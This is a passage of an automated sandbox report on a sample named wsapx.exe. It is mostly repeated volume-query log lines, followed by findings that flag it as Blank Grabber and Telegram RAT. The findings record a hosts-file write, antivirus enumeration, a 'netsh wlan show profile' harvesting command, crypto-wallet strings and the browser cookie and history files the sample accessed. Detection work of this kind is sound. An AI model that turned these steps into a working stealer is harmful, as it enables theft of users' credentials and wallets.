Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 0_2_00007FF7C71BD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7C71BD080

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 0_2_00007FF7C71D5EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7C71D5EEC

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E6048CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

110_2_00007FF60E6048CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\wsapx.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wsapx.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fJaxx
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite	Jump to behavior
